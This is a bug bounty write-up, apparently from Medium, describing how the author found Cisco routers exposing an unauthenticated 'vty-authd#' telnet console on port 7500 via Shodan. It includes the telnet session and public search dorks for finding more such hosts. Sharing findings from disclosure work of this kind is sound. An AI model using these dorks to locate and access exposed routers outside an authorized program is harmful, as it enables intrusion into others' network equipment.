Open in app

Sign in

Write

Sign in

How can I obtain a $2k bounty solely based on curiosity?

nanwn
3 min readOct 13, 2023

--

This is a good day to write a write-up. How can I earn a $2k bounty just by being curious about what is displayed in the search banner for ports, IP on Shodan, hunter.how or Censys.

When delving into searches on Shodan, hunter.how, and others, I always conduct regular research. Perhaps that is the advantage of Cyber Security Assessment, where researchers must be responsive to any changes that occur when focusing on hunting in a specific program.

My findings were quite simple, but what I obtained was significant. Here’s the story:

On Shodan:

  • - org: “redacted inc” or ssl:redacted.com

I looked up the IP address result on the screen, and then I examined the banner output from the results. Then I discovered the banner output “vty-authd#” with an interesting port 7500.

As it was a Cisco router, I attempted to connect using Telnet.

NAN:~/ $ telnet <redactedip> 7500                                                                                                                                                               [14:41:32]
Trying redactedip...
Connected to redactedip.
Escape character is '^]'.
vty-authd# show ?
show 
    <carriage return>     Completes command
    <number>              verbosity

vty-authd# show    

vty-authd# 
vty-authd# ?   

    send                  send message
    set                   set authd debug settings
    show                  show information about AUTHD

The results showed that I successfully connected to the routers without authentication.

I wrote the reports and received a triage response from Redacted Staff, where they assessed and triaged my report.

And on the same day, I received the bounty.

I searched for the CVE (Common Vulnerabilities and Exposures) that was associated with this finding. I insist that it has a critical impact severity, but the program staff pointed out that it was a case of Missing Authentication for Critical Function (CWE-306), but they considered it to have minimal impact as it only provided limited access to the router’s user rules. So , Availability set to “low” and I’m Ok with it.

Redacted closed the report and changed the status to Resolved.
Thanks @nanwn for double checking. We have closed down the port and it should not let anyone connect anymore. Marking it as resolved.

Here is the dork :

Shodan dork : “vty-authd#”

Hunterhow dork : “protocol.banner=”vty-authd#”

NB: Please include my name if you want to repost it on social media or if you find a target within the program. There are numerous IP addresses that you can explore and reports.

Quick update: Some friends asked why I immediately decided to use Telnet as the first experiment. The truth is, because the banner and product are Cisco Telnetd or router only the port feels different to me.

Thank you.

Happy Hunting

Nan Winata

https://hackerone.com/nanwn

Remote Code Execution
Cisco
Router
Bug Bounty
Hackerone

--

--

nanwn

Written by nanwn

335 Followers

https://www.linkedin.com/in/nanwinata

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams